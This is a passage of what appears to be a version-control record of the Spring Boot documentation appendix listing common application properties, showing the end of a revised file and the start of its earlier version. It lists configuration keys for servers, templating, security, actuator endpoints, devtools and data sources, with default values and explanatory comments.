BATCH ({sc-spring-boot-autoconfigure}\/batch\/BatchProperties.{sc-ext}[BatchProperties])\n\tspring.batch.job.names=job1,job2\n\tspring.batch.job.enabled=true\n\tspring.batch.initializer.enabled=true\n\tspring.batch.schema= # batch schema to load\n\tspring.batch.table-prefix= # table prefix for all the batch meta-data tables\n\n\t# SPRING CACHE ({sc-spring-boot-autoconfigure}\/cache\/CacheProperties.{sc-ext}[CacheProperties])\n\tspring.cache.type= # generic, ehcache, hazelcast, infinispan, jcache, redis, guava, simple, none\n\tspring.cache.cache-names= # cache names to create on startup\n\tspring.cache.ehcache.config= # location of the ehcache configuration\n\tspring.cache.hazelcast.config= # location of the hazelcast configuration\n\tspring.cache.infinispan.config= # location of the infinispan configuration\n\tspring.cache.jcache.config= # location of jcache configuration\n\tspring.cache.jcache.provider= # fully qualified name of the CachingProvider implementation to use\n\tspring.cache.guava.spec= # link:http:\/\/docs.guava-libraries.googlecode.com\/git\/javadoc\/com\/google\/common\/cache\/CacheBuilderSpec.html[guava specs]\n\n\t# AOP\n\tspring.aop.auto=\n\tspring.aop.proxy-target-class=\n\n\t# FILE ENCODING ({sc-spring-boot}\/context\/FileEncodingApplicationListener.{sc-ext}[FileEncodingApplicationListener])\n\tspring.mandatory-file-encoding= # Expected character encoding the application must use\n\n\t# SPRING SOCIAL ({sc-spring-boot-autoconfigure}\/social\/SocialWebAutoConfiguration.{sc-ext}[SocialWebAutoConfiguration])\n\tspring.social.auto-connection-views=true # Set to true for default connection views or false if you provide your own\n\n\t# SPRING SOCIAL FACEBOOK ({sc-spring-boot-autoconfigure}\/social\/FacebookAutoConfiguration.{sc-ext}[FacebookAutoConfiguration])\n\tspring.social.facebook.app-id= # your application's Facebook App ID\n\tspring.social.facebook.app-secret= # your application's Facebook App Secret\n\n\t# SPRING SOCIAL LINKEDIN ({sc-spring-boot-autoconfigure}\/social\/LinkedInAutoConfiguration.{sc-ext}[LinkedInAutoConfiguration])\n\tspring.social.linkedin.app-id= # your application's LinkedIn App ID\n\tspring.social.linkedin.app-secret= # your application's LinkedIn App Secret\n\n\t# SPRING SOCIAL TWITTER ({sc-spring-boot-autoconfigure}\/social\/TwitterAutoConfiguration.{sc-ext}[TwitterAutoConfiguration])\n\tspring.social.twitter.app-id= # your application's Twitter App ID\n\tspring.social.twitter.app-secret= # your application's Twitter App Secret\n\n\t# SPRING MOBILE SITE PREFERENCE ({sc-spring-boot-autoconfigure}\/mobile\/SitePreferenceAutoConfiguration.{sc-ext}[SitePreferenceAutoConfiguration])\n\tspring.mobile.sitepreference.enabled=true # enabled by default\n\n\t# SPRING MOBILE DEVICE VIEWS ({sc-spring-boot-autoconfigure}\/mobile\/DeviceDelegatingViewResolverAutoConfiguration.{sc-ext}[DeviceDelegatingViewResolverAutoConfiguration])\n\tspring.mobile.devicedelegatingviewresolver.enabled=true # disabled by default\n\tspring.mobile.devicedelegatingviewresolver.enable-fallback= # enable support for fallback resolution, default to false.\n\tspring.mobile.devicedelegatingviewresolver.normal-prefix=\n\tspring.mobile.devicedelegatingviewresolver.normal-suffix=\n\tspring.mobile.devicedelegatingviewresolver.mobile-prefix=mobile\/\n\tspring.mobile.devicedelegatingviewresolver.mobile-suffix=\n\tspring.mobile.devicedelegatingviewresolver.tablet-prefix=tablet\/\n\tspring.mobile.devicedelegatingviewresolver.tablet-suffix=\n\n\t# ----------------------------------------\n\t# DEVTOOLS PROPERTIES\n\t# ----------------------------------------\n\n # DEVTOOLS ({sc-spring-boot-devtools}\/autoconfigure\/DevToolsProperties.{sc-ext}[DevToolsProperties])\n spring.devtools.restart.enabled=true # enable automatic restart\n spring.devtools.restart.exclude= # patterns that should be excluding for triggering a full restart\n spring.devtools.restart.poll-interval= # amount of time (in milliseconds) to wait between polling for classpath changes\n spring.devtools.restart.quiet-period= # amount of quiet time (in milliseconds) required without any classpath changes before a restart is triggered\n spring.devtools.restart.trigger-file= # name of a specific file that when changed will trigger the restart\n\tspring.devtools.livereload.enabled=true # enable a livereload.com compatible server\n spring.devtools.livereload.port=35729 # server port.\n\n # REMOTE DEVTOOLS ({sc-spring-boot-devtools}\/autoconfigure\/RemoteDevToolsProperties.{sc-ext}[RemoteDevToolsProperties])\n spring.devtools.remote.context-path=\/.~~spring-boot!~ # context path used to handle the remote connection\n spring.devtools.remote.debug.enabled=true # enable remote debug support\n spring.devtools.remote.debug.local-port=8000 # local remote debug server port\n spring.devtools.remote.restart.enabled=true # enable remote restart\n spring.devtools.remote.secret= # a shared secret required to establish a connection\n spring.devtools.remote.secret-header-name=X-AUTH-TOKEN # HTTP header used to transfer the shared secret\n\n\t# ----------------------------------------\n\t# ACTUATOR PROPERTIES\n\t# ----------------------------------------\n\n\t# MANAGEMENT HTTP SERVER ({sc-spring-boot-actuator}\/autoconfigure\/ManagementServerProperties.{sc-ext}[ManagementServerProperties])\n\tmanagement.port= # defaults to 'server.port'\n\tmanagement.address= # bind to a specific NIC\n\tmanagement.context-path= # default to '\/'\n\tmanagement.add-application-context-header= # default to true\n\tmanagement.security.enabled=true # enable security\n\tmanagement.security.role=ADMIN # role required to access the management endpoint\n\tmanagement.security.sessions=stateless # session creating policy to use (always, never, if_required, stateless)\n\n\t# PID FILE ({sc-spring-boot-actuator}\/system\/ApplicationPidFileWriter.{sc-ext}[ApplicationPidFileWriter])\n\tspring.pid.file= # Location of the PID file to write\n\tspring.pid.fail-on-write-error= # Fail if the PID file cannot be written\n\n\t# ENDPOINTS ({sc-spring-boot-actuator}\/endpoint\/AbstractEndpoint.{sc-ext}[AbstractEndpoint] subclasses)\n\tendpoints.autoconfig.id=autoconfig\n\tendpoints.autoconfig.sensitive=true\n\tendpoints.autoconfig.enabled=true\n\tendpoints.beans.id=beans\n\tendpoints.beans.sensitive=true\n\tendpoints.beans.enabled=true\n\tendpoints.configprops.id=configprops\n\tendpoints.configprops.sensitive=true\n\tendpoints.configprops.enabled=true\n\tendpoints.configprops.keys-to-sanitize=password,secret,key,.*credentials.*,vcap_services # suffix or regex\n\tendpoints.dump.id=dump\n\tendpoints.dump.sensitive=true\n\tendpoints.dump.enabled=true\n\tendpoints.enabled=true # enable all endpoints\n\tendpoints.env.id=env\n\tendpoints.env.sensitive=true\n\tendpoints.env.enabled=true\n\tendpoints.env.keys-to-sanitize=password,secret,key,.*credentials.*,vcap_services # suffix or regex\n\tendpoints.health.id=health\n\tendpoints.health.sensitive=true\n\tendpoints.health.enabled=true\n\tendpoints.health.mapping.*= # mapping of health statuses to HttpStatus codes\n\tendpoints.health.time-to-live=1000\n\tendpoints.info.id=info\n\tendpoints.info.sensitive=false\n\tendpoints.info.enabled=true\n\tendpoints.logfile.path=\/logfile\n\tendpoints.logfile.sensitive=true\n\tendpoints.logfile.enabled=true\n\tendpoints.mappings.enabled=true\n\tendpoints.mappings.id=mappings\n\tendpoints.mappings.sensitive=true\n\tendpoints.metrics.id=metrics\n\tendpoints.metrics.sensitive=true\n\tendpoints.metrics.enabled=true\n\tendpoints.shutdown.id=shutdown\n\tendpoints.shutdown.sensitive=true\n\tendpoints.shutdown.enabled=false\n\tendpoints.trace.id=trace\n\tendpoints.trace.sensitive=true\n\tendpoints.trace.enabled=true\n\n\t# ENDPOINTS CORS CONFIGURATION ({sc-spring-boot-actuator}\/autoconfigure\/MvcEndpointCorsProperties.{sc-ext}[MvcEndpointCorsProperties])\n\tendpoints.cors.allow-credentials= # set whether user credentials are support. When not set, credentials are not supported.\n\tendpoints.cors.allowed-origins= # comma-separated list of origins to allow. * allows all origins. When not set, CORS support is disabled.\n\tendpoints.cors.allowed-methods= # comma-separated list of methods to allow. * allows all methods. When not set, defaults to GET.\n\tendpoints.cors.allowed-headers= # comma-separated list of headers to allow in a request. * allows all headers.\n\tendpoints.cors.exposed-headers= # comma-separated list of headers to include in a response.\n\tendpoints.cors.max-age=1800 # how long, in seconds, the response from a pre-flight request can be cached by clients.\n\n\t# HEALTH INDICATORS (previously health.*)\n\tmanagement.health.db.enabled=true\n\tmanagement.health.elasticsearch.enabled=true\n\tmanagement.health.elasticsearch.indices= # comma-separated index names\n\tmanagement.health.elasticsearch.response-timeout=100 # the time, in milliseconds, to wait for a response from the cluster\n\tmanagement.health.diskspace.enabled=true\n\tmanagement.health.diskspace.path=.\n\tmanagement.health.diskspace.threshold=10485760\n\tmanagement.health.jms.enabled=true\n\tmanagement.health.mail.enabled=true\n\tmanagement.health.mongo.enabled=true\n\tmanagement.health.rabbit.enabled=true\n\tmanagement.health.redis.enabled=true\n\tmanagement.health.solr.enabled=true\n\tmanagement.health.status.order=DOWN, OUT_OF_SERVICE, UNKNOWN, UP\n\n\t# MVC ONLY ENDPOINTS\n\tendpoints.jolokia.path=\/jolokia\n\tendpoints.jolokia.sensitive=true\n\tendpoints.jolokia.enabled=true # when using Jolokia\n\n\t# JMX ENDPOINT ({sc-spring-boot-actuator}\/autoconfigure\/EndpointMBeanExportProperties.{sc-ext}[EndpointMBeanExportProperties])\n\tendpoints.jmx.enabled=true # enable JMX export of all endpoints\n\tendpoints.jmx.domain= # the JMX domain, defaults to 'org.springboot'\n\tendpoints.jmx.unique-names=false\n\tendpoints.jmx.static-names=\n\n\t# JOLOKIA ({sc-spring-boot-actuator}\/autoconfigure\/JolokiaProperties.{sc-ext}[JolokiaProperties])\n\tjolokia.config.*= # See Jolokia manual\n\n\t# REMOTE SHELL\n\tshell.auth=simple # jaas, key, simple, spring\n\tshell.command-refresh-interval=-1\n\tshell.command-path-patterns= # classpath*:\/commands\/**, classpath*:\/crash\/commands\/**\n\tshell.config-path-patterns= # classpath*:\/crash\/*\n\tshell.disabled-commands=jpa*,jdbc*,jndi* # comma-separated list of commands to disable\n\tshell.disabled-plugins=false # don't expose plugins\n\tshell.ssh.enabled= # ssh settings ...\n\tshell.ssh.key-path=\n\tshell.ssh.port=\n\tshell.telnet.enabled= # telnet settings ...\n\tshell.telnet.port=\n\tshell.auth.jaas.domain= # authentication settings ...\n\tshell.auth.key.path=\n\tshell.auth.simple.user.name=\n\tshell.auth.simple.user.password=\n\tshell.auth.spring.roles=\n\n\t# METRICS EXPORT ({sc-spring-boot-actuator}\/metrics\/export\/MetricExportProperties.{sc-ext}[MetricExportProperties])\n\tspring.metrics.export.enabled=true # flag to disable all metric exports (assuming any MetricWriters are available)\n\tspring.metrics.export.delay-millis=5000 # delay in milliseconds between export ticks\n\tspring.metrics.export.send-latest=true # flag to switch off any available optimizations based on not exporting unchanged metric values\n\tspring.metrics.export.includes= # list of patterns for metric names to include\n\tspring.metrics.export.excludes= # list of patterns for metric names to exclude. Applied after the includes\n\tspring.metrics.export.redis.prefix=spring.metrics # prefix for redis repository if active\n\tspring.metrics.export.redis.key=keys.spring.metrics # key for redis repository export (if active)\n\tspring.metrics.export.triggers.*= # specific trigger properties per MetricWriter bean name\n\n\t# SENDGRID ({sc-spring-boot-autoconfigure}\/sendgrid\/SendGridAutoConfiguration.{sc-ext}[SendGridAutoConfiguration])\n\tspring.sendgrid.username= # SendGrid account username\n\tspring.sendgrid.password= # SendGrid account password\n\tspring.sendgrid.proxy.host= # SendGrid proxy host\n\tspring.sendgrid.proxy.port= # SendGrid proxy port\n\n\t# GIT INFO\n\tspring.git.properties= # resource ref to generated git info properties file\n----\n","old_contents":":numbered!:\n[appendix]\n[[common-application-properties]]\n== Common application properties\nVarious properties can be specified inside your `application.properties`\/`application.yml`\nfile or as command line switches. This section provides a list common Spring Boot\nproperties and references to the underlying classes that consume them.\n\nNOTE: Property contributions can come from additional jar files on your classpath so\nyou should not consider this an exhaustive list. It is also perfectly legit to define\nyour own properties.\n\nWARNING: This sample file is meant as a guide only. Do **not** copy\/paste the entire\ncontent into your application; rather pick only the properties that you need.\n\n\n[source,properties,indent=0,subs=\"verbatim,attributes,macros\"]\n----\n\t# ===================================================================\n\t# COMMON SPRING BOOT PROPERTIES\n\t#\n\t# This sample file is provided as a guideline. Do NOT copy it in its\n\t# entirety to your own application. ^^^\n\t# ===================================================================\n\n\t# ----------------------------------------\n\t# CORE PROPERTIES\n\t# ----------------------------------------\n\n # BANNER\n banner.charset=UTF-8 # banner file encoding\n banner.location=classpath:banner.txt # banner file location\n\n\t# SPRING CONFIG ({sc-spring-boot}\/context\/config\/ConfigFileApplicationListener.{sc-ext}[ConfigFileApplicationListener])\n\tspring.config.name= # config file name (default to 'application')\n\tspring.config.location= # location of config file\n\n\t# PROFILES\n\tspring.profiles.active= # comma list of <<howto-set-active-spring-profiles,active profiles>>\n\tspring.profiles.include= # unconditionally activate the specified comma separated profiles\n\n\t# APPLICATION SETTINGS ({sc-spring-boot}\/SpringApplication.{sc-ext}[SpringApplication])\n\tspring.main.sources= # sources (class name, package name or XML resource location) to include\n\tspring.main.web-environment= # detect by default\n\tspring.main.show-banner=true\n\tspring.main....= # see class for all properties\n\n\t# ADMIN ({sc-spring-boot-autoconfigure}\/admin\/SpringApplicationAdminJmxAutoConfiguration.{sc-ext}[SpringApplicationAdminJmxAutoConfiguration])\n\tspring.application.admin.enabled=false # enable admin features for the application\n\tspring.application.admin.jmx-name=org.springframework.boot:type=Admin,name=SpringApplication # JMX name of the application admin MBean\n\n\t# OUTPUT\n\tspring.output.ansi.enabled=detect # Configure the ANSI output (\"detect\", \"always\", \"never\")\n\n\t# LOGGING\n\tlogging.path=\/var\/log\n\tlogging.file=myapp.log\n\tlogging.config= # location of config file (default classpath:logback.xml for logback)\n\tlogging.level.*= # levels for loggers, e.g. \"logging.level.org.springframework=DEBUG\" (TRACE, DEBUG, INFO, WARN, ERROR, FATAL, OFF)\n\n\t# IDENTITY ({sc-spring-boot}\/context\/ContextIdApplicationContextInitializer.{sc-ext}[ContextIdApplicationContextInitializer])\n\tspring.application.name=\n\tspring.application.index=\n\n\t# EMBEDDED SERVER CONFIGURATION ({sc-spring-boot-autoconfigure}\/web\/ServerProperties.{sc-ext}[ServerProperties])\n\tserver.port=8080\n\tserver.address= # bind to a specific NIC\n\tserver.compression.enabled=false # if response compression is enabled\n\tserver.compression.mime-types=text\/html,text\/xml,text\/plain,text\/css # comma-separated list of MIME types that should be compressed\n\tserver.compression.min-response-size=2048 # minimum response size that is required for compression to be performed\n\tserver.context-parameters.*= # Servlet context init parameters, e.g. server.context-parameters.a=alpha\n\tserver.context-path= # the context path, defaults to '\/'\n\tserver.jsp-servlet.class-name=org.apache.jasper.servlet.JspServlet # The class name of the JSP servlet\n\tserver.jsp-servlet.init-parameters.*= # Init parameters used to configure the JSP servlet\n\tserver.jsp-servlet.registered=true # Whether or not the JSP servlet is registered\n\tserver.servlet-path= # the servlet path, defaults to '\/'\n\tserver.display-name= # the display name of the application\n\tserver.session.timeout= # session timeout in seconds\n\tserver.session.tracking-modes= # tracking modes (one or more of \"cookie\" ,\"url\", \"ssl\")\n\tserver.session.cookie.name= # session cookie name\n\tserver.session.cookie.domain= # domain for the session cookie\n\tserver.session.cookie.path= # path of the session cookie\n\tserver.session.cookie.comment= # comment for the session cookie\n\tserver.session.cookie.http-only= # \"HttpOnly\" flag for the session cookie\n\tserver.session.cookie.secure= # \"Secure\" flag for the session cookie\n\tserver.session.cookie.max-age= # maximum age of the session cookie in seconds\n\tserver.ssl.enabled=true # if SSL support is enabled\n\tserver.ssl.client-auth= # want or need\n\tserver.ssl.key-alias=\n\tserver.ssl.ciphers= # supported SSL ciphers\n\tserver.ssl.key-password=\n\tserver.ssl.key-store=\n\tserver.ssl.key-store-password=\n\tserver.ssl.key-store-provider=\n\tserver.ssl.key-store-type=\n\tserver.ssl.protocol=TLS\n\tserver.ssl.trust-store=\n\tserver.ssl.trust-store-password=\n\tserver.ssl.trust-store-provider=\n\tserver.ssl.trust-store-type=\n\tserver.tomcat.access-log-pattern= # log pattern of the access log\n\tserver.tomcat.access-log-enabled=false # is access logging enabled\n\tserver.tomcat.internal-proxies=10\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t192\\\\.168\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t169\\\\.254\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t127\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t172\\\\.1[6-9]{1}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t172\\\\.2[0-9]{1}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t172\\\\.3[0-1]{1}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3} # regular expression matching trusted IP addresses\n\tserver.tomcat.protocol-header=x-forwarded-proto # front end proxy forward header\n\tserver.tomcat.protocol-header-https-value=https # value of the protocol header that indicates that the incoming request uses SSL\n\tserver.tomcat.port-header= # front end proxy port header\n\tserver.tomcat.remote-ip-header=x-forwarded-for\n\tserver.tomcat.basedir=\/tmp # base dir (usually not needed, defaults to tmp)\n\tserver.tomcat.background-processor-delay=30; # in seconds\n\tserver.tomcat.max-http-header-size= # maximum size in bytes of the HTTP message header\n\tserver.tomcat.max-threads = 0 # number of threads in protocol handler\n\tserver.tomcat.uri-encoding = UTF-8 # character encoding to use for URL decoding\n\tserver.undertow.access-log-enabled=false # if access logging is enabled\n\tserver.undertow.access-log-pattern=common # log pattern of the access log\n\tserver.undertow.access-log-dir=logs # access logs directory\n\tserver.undertow.buffer-size= # size of each buffer in bytes\n server.undertow.buffers-per-region= # number of buffer per region\n server.undertow.direct-buffers=false # allocate buffers outside the Java heap\n server.undertow.io-threads= # number of I\/O threads to create for the worker\n server.undertow.worker-threads= # number of worker threads\n\n\t# SPRING MVC ({sc-spring-boot-autoconfigure}\/web\/WebMvcProperties.{sc-ext}[WebMvcProperties])\n\tspring.mvc.locale= # set fixed locale, e.g. en_UK\n\tspring.mvc.date-format= # set fixed date format, e.g. dd\/MM\/yyyy\n\tspring.mvc.favicon.enabled=true\n\tspring.mvc.message-codes-resolver-format= # PREFIX_ERROR_CODE \/ POSTFIX_ERROR_CODE\n\tspring.mvc.ignore-default-model-on-redirect=true # if the the content of the \"default\" model should be ignored redirects\n\tspring.mvc.async.request-timeout= # async request timeout in milliseconds\n\tspring.mvc.view.prefix= # MVC view prefix\n\tspring.mvc.view.suffix= # ... and suffix\n\n\t# SPRING RESOURCES HANDLING ({sc-spring-boot-autoconfigure}\/web\/ResourceProperties.{sc-ext}[ResourceProperties])\n\tspring.resources.cache-period= # cache timeouts in headers sent to browser\n\tspring.resources.add-mappings=true # if default mappings should be added\n\tspring.resources.static-locations= # comma-separated list of the locations that serve static content (e.g. 'classpath:\/resources\/')\n\tspring.resources.chain.enabled=false # enable the Spring Resource Handling chain (enabled automatically if at least a strategy is enabled)\n\tspring.resources.chain.cache=false # enable in-memory caching of resource resolution\n\tspring.resources.chain.html-application-cache=false # enable HTML5 appcache manifest rewriting\n\tspring.resources.chain.strategy.content.enabled=false # enable a content version strategy\n\tspring.resources.chain.strategy.content.paths= # comma-separated list of regular expression patterns to apply the version strategy to\n\tspring.resources.chain.strategy.fixed.enabled=false # enable a fixed version strategy\n\tspring.resources.chain.strategy.fixed.paths= # comma-separated list of regular expression patterns to apply the version strategy to\n\tspring.resources.chain.strategy.fixed.version= # version string to use for this version strategy\n\n\t# MULTIPART ({sc-spring-boot-autoconfigure}\/web\/MultipartProperties.{sc-ext}[MultipartProperties])\n\tmultipart.enabled=true\n\tmultipart.file-size-threshold=0 # Threshold after which files will be written to disk.\n\tmultipart.location= # Intermediate location of uploaded files.\n\tmultipart.max-file-size=1Mb # Max file size.\n\tmultipart.max-request-size=10Mb # Max request size.\n\n\t# SPRING HATEOAS ({sc-spring-boot-autoconfigure}\/hateoas\/HateoasProperties.{sc-ext}[HateoasProperties])\n\tspring.hateoas.apply-to-primary-object-mapper=true # if the primary mapper should also be configured\n\n\t# HTTP encoding ({sc-spring-boot-autoconfigure}\/web\/HttpEncodingProperties.{sc-ext}[HttpEncodingProperties])\n\tspring.http.encoding.charset=UTF-8 # the encoding of HTTP requests\/responses\n\tspring.http.encoding.enabled=true # enable http encoding support\n\tspring.http.encoding.force=true # force the configured encoding\n\n\t# HTTP message conversion\n\tspring.http.converters.preferred-json-mapper= # the preferred JSON mapper to use for HTTP message conversion. Set to \"gson\" to force the use of Gson when both it and Jackson are on the classpath.\n\n\t# JACKSON ({sc-spring-boot-autoconfigure}\/jackson\/JacksonProperties.{sc-ext}[JacksonProperties])\n\tspring.jackson.date-format= # Date format string (e.g. yyyy-MM-dd HH:mm:ss), or a fully-qualified date format class name (e.g. com.fasterxml.jackson.databind.util.ISO8601DateFormat)\n\tspring.jackson.property-naming-strategy= # One of the constants on Jackson's PropertyNamingStrategy (e.g. CAMEL_CASE_TO_LOWER_CASE_WITH_UNDERSCORES) or the fully-qualified class name of a PropertyNamingStrategy subclass\n\tspring.jackson.deserialization.*= # see Jackson's DeserializationFeature\n\tspring.jackson.generator.*= # see Jackson's JsonGenerator.Feature\n\tspring.jackson.joda-date-time-format= # Joda date time format string\n\tspring.jackson.mapper.*= # see Jackson's MapperFeature\n\tspring.jackson.parser.*= # see Jackson's JsonParser.Feature\n\tspring.jackson.serialization.*= # see Jackson's SerializationFeature\n\tspring.jackson.serialization-inclusion= # Controls the inclusion of properties during serialization (see Jackson's JsonInclude.Include)\n\n\t# THYMELEAF ({sc-spring-boot-autoconfigure}\/thymeleaf\/ThymeleafAutoConfiguration.{sc-ext}[ThymeleafAutoConfiguration])\n\tspring.thymeleaf.check-template-location=true\n\tspring.thymeleaf.prefix=classpath:\/templates\/\n\tspring.thymeleaf.excluded-view-names= # comma-separated list of view names that should be excluded from resolution\n\tspring.thymeleaf.view-names= # comma-separated list of view names that can be resolved\n\tspring.thymeleaf.suffix=.html\n\tspring.thymeleaf.mode=HTML5\n\tspring.thymeleaf.enabled=true # enable MVC view resolution\n\tspring.thymeleaf.encoding=UTF-8\n\tspring.thymeleaf.content-type=text\/html # ;charset=<encoding> is added\n\tspring.thymeleaf.cache=true # set to false for hot refresh\n\n\t# FREEMARKER ({sc-spring-boot-autoconfigure}\/freemarker\/FreeMarkerAutoConfiguration.{sc-ext}[FreeMarkerAutoConfiguration])\n\tspring.freemarker.allow-request-override=false\n\tspring.freemarker.cache=true\n\tspring.freemarker.check-template-location=true\n\tspring.freemarker.charset=UTF-8\n\tspring.freemarker.content-type=text\/html\n\tspring.freemarker.enabled=true # enable MVC view resolution\n\tspring.freemarker.expose-request-attributes=false\n\tspring.freemarker.expose-session-attributes=false\n\tspring.freemarker.expose-spring-macro-helpers=false\n\tspring.freemarker.prefix=\n\tspring.freemarker.prefer-file-system-access=true # prefer file system access for template loading\n\tspring.freemarker.request-context-attribute=\n\tspring.freemarker.settings.*=\n\tspring.freemarker.suffix=.ftl\n\tspring.freemarker.template-loader-path=classpath:\/templates\/ # comma-separated list\n\tspring.freemarker.view-names= # whitelist of view names that can be resolved\n\n\t# GROOVY TEMPLATES ({sc-spring-boot-autoconfigure}\/groovy\/template\/GroovyTemplateAutoConfiguration.{sc-ext}[GroovyTemplateAutoConfiguration])\n\tspring.groovy.template.cache=true\n\tspring.groovy.template.charset=UTF-8\n\tspring.groovy.template.check-template-location=true # check that the templates location exists\n\tspring.groovy.template.configuration.*= # See GroovyMarkupConfigurer\n\tspring.groovy.template.content-type=text\/html\n\tspring.groovy.template.enabled=true # enable MVC view resolution\n\tspring.groovy.template.prefix=\n\tspring.groovy.template.resource-loader-path=classpath:\/templates\/\n spring.groovy.template.suffix=.tpl\n\tspring.groovy.template.view-names= # whitelist of view names that can be resolved\n\n\t# VELOCITY TEMPLATES ({sc-spring-boot-autoconfigure}\/velocity\/VelocityAutoConfiguration.{sc-ext}[VelocityAutoConfiguration])\n\tspring.velocity.allow-request-override=false\n\tspring.velocity.cache=true\n\tspring.velocity.check-template-location=true\n\tspring.velocity.charset=UTF-8\n\tspring.velocity.content-type=text\/html\n\tspring.velocity.date-tool-attribute=\n\tspring.velocity.enabled=true # enable MVC view resolution\n\tspring.velocity.expose-request-attributes=false\n\tspring.velocity.expose-session-attributes=false\n\tspring.velocity.expose-spring-macro-helpers=false\n\tspring.velocity.number-tool-attribute=\n\tspring.velocity.prefer-file-system-access=true # prefer file system access for template loading\n\tspring.velocity.prefix=\n\tspring.velocity.properties.*=\n\tspring.velocity.request-context-attribute=\n\tspring.velocity.resource-loader-path=classpath:\/templates\/\n\tspring.velocity.suffix=.vm\n\tspring.velocity.toolbox-config-location= # velocity Toolbox config location, for example \"\/WEB-INF\/toolbox.xml\"\n\tspring.velocity.view-names= # whitelist of view names that can be resolved\n\n\t# MUSTACHE TEMPLATES ({sc-spring-boot-autoconfigure}\/mustache\/MustacheAutoConfiguration.{sc-ext}[MustacheAutoConfiguration])\n\tspring.mustache.cache=true\n\tspring.mustache.charset=UTF-8\n\tspring.mustache.check-template-location=true\n\tspring.mustache.content-type=UTF-8\n\tspring.mustache.enabled=true # enable MVC view resolution\n\tspring.mustache.prefix=\n\tspring.mustache.suffix=.html\n\tspring.mustache.view-names= # whitelist of view names that can be resolved\n\n\t# JERSEY ({sc-spring-boot-autoconfigure}}\/jersey\/JerseyProperties.{sc-ext}[JerseyProperties])\n\tspring.jersey.type=servlet # servlet or filter\n\tspring.jersey.init= # init params\n\tspring.jersey.filter.order=\n\n\t# INTERNATIONALIZATION ({sc-spring-boot-autoconfigure}\/MessageSourceAutoConfiguration.{sc-ext}[MessageSourceAutoConfiguration])\n\tspring.messages.basename=messages\n\tspring.messages.cache-seconds=-1\n\tspring.messages.encoding=UTF-8\n\n\t[[common-application-properties-security]]\n\t# SECURITY ({sc-spring-boot-autoconfigure}\/security\/SecurityProperties.{sc-ext}[SecurityProperties])\n\tsecurity.user.name=user # login username\n\tsecurity.user.password= # login password\n\tsecurity.user.role=USER # role assigned to the user\n\tsecurity.require-ssl=false # advanced settings ...\n\tsecurity.enable-csrf=false\n\tsecurity.basic.enabled=true\n\tsecurity.basic.realm=Spring\n\tsecurity.basic.path= # \/**\n\tsecurity.basic.authorize-mode= # ROLE, AUTHENTICATED, NONE\n\tsecurity.filter-order=0\n\tsecurity.headers.xss=false\n\tsecurity.headers.cache=false\n\tsecurity.headers.frame=false\n\tsecurity.headers.content-type=false\n\tsecurity.headers.hsts=all # none \/ domain \/ all\n\tsecurity.sessions=stateless # always \/ never \/ if_required \/ stateless\n\tsecurity.ignored= # Comma-separated list of paths to exclude from the default secured paths\n\n\t# SECURITY OAUTH2 CLIENT ({sc-spring-boot-autoconfigure}\/security\/oauth2\/OAuth2ClientProperties.{sc-ext}[OAuth2ClientProperties]\n\tsecurity.oauth2.client.client-id= # OAuth2 client id\n security.oauth2.client.client-secret= # OAuth2 client secret. A random secret is generated by default\n\n # SECURITY OAUTH2 SSO ({sc-spring-boot-autoconfigure}\/security\/oauth2\/client\/OAuth2SsoProperties.{sc-ext}[OAuth2SsoProperties]\n security.oauth2.sso.filter-order= # Filter order to apply if not providing an explicit WebSecurityConfigurerAdapter\n security.oauth2.sso.login-path= # Path to the login page, i.e. the one that triggers the redirect to the OAuth2 Authorization Server\n\n\t# DATASOURCE ({sc-spring-boot-autoconfigure}\/jdbc\/DataSourceAutoConfiguration.{sc-ext}[DataSourceAutoConfiguration] & {sc-spring-boot-autoconfigure}\/jdbc\/DataSourceProperties.{sc-ext}[DataSourceProperties])\n\tspring.datasource.name= # name of the data source\n\tspring.datasource.initialize=true # populate using data.sql\n\tspring.datasource.schema= # a schema (DDL) script resource reference\n\tspring.datasource.data= # a data (DML) script resource reference\n\tspring.datasource.sql-script-encoding= # a charset for reading SQL scripts\n\tspring.datasource.platform= # the platform to use in the schema resource (schema-${platform}.sql)\n\tspring.datasource.continue-on-error=false # continue even if can't be initialized\n\tspring.datasource.separator=; # statement separator in SQL initialization scripts\n\tspring.datasource.driver-class-name= # JDBC Settings...\n\tspring.datasource.url=\n\tspring.datasource.username=\n\tspring.datasource.password=\n\tspring.datasource.jndi-name= # For JNDI lookup (class, url, username & password are ignored when set)\n\tspring.datasource.max-active=100 # Advanced configuration...\n\tspring.datasource.max-idle=8\n\tspring.datasource.min-idle=8\n\tspring.datasource.initial-size=10\n\tspring.datasource.validation-query=\n\tspring.datasource.test-on-borrow=false\n\tspring.datasource.test-on-return=false\n\tspring.datasource.test-while-idle=\n\tspring.datasource.time-between-eviction-runs-millis=\n\tspring.datasource.min-evictable-idle-time-millis=\n\tspring.datasource.max-wait=\n\tspring.datasource.jmx-enabled=false # Export JMX MBeans (if supported)\n\n\t# DAO ({sc-spring-boot-autoconfigure}\/dao\/PersistenceExceptionTranslationAutoConfiguration.{sc-ext}[PersistenceExceptionTranslationAutoConfiguration])\n\tspring.dao.exceptiontranslation.enabled=true\n\n\t# MONGODB ({sc-spring-boot-autoconfigure}\/mongo\/MongoProperties.{sc-ext}[MongoProperties])\n\tspring.data.mongodb.host= # the db host\n\tspring.data.mongodb.port=27017 # the connection port (defaults to 27107)\n\tspring.data.mongodb.uri=mongodb:\/\/localhost\/test # connection URL\n\tspring.data.mongodb.database=\n\tspring.data.mongodb.authentication-database=\n\tspring.data.mongodb.grid-fs-database=\n\tspring.data.mongodb.username=\n\tspring.data.mongodb.password=\n\tspring.data.mongodb.repositories.enabled=true # if spring data repository support is enabled\n\tspring.data.mongodb.field-naming-strategy= # fully qualified name of the FieldNamingStrategy to use\n\n\t# JPA ({sc-spring-boot-autoconfigure}\/orm\/jpa\/JpaBaseConfiguration.{sc-ext}[JpaBaseConfiguration], {sc-spring-boot-autoconfigure}\/orm\/jpa\/HibernateJpaAutoConfiguration.{sc-ext}[HibernateJpaAutoConfiguration])\n\tspring.jpa.properties.*= # properties to set on the JPA 